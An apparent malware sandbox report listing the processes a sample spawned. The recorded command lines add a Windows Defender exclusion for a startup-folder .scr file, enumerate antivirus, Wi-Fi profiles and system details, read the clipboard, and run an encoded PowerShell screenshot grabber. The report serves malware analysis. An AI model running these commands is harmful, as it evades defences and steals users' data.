Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:37:23
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff64eea0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff64eea0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:37:24
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:37:25
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff74c130000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6996, Parent PID: 6812

General

Target ID:	30
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff74c130000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7736, Parent PID: 7432

General

Target ID:	37
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7600, Parent PID: 7752

General

Target ID:	38
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8176, Parent PID: 7888

General

Target ID:	43
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff644170000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff74c130000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff644170000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff644170000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9590000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff7403e0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff642ec0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0xe0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAA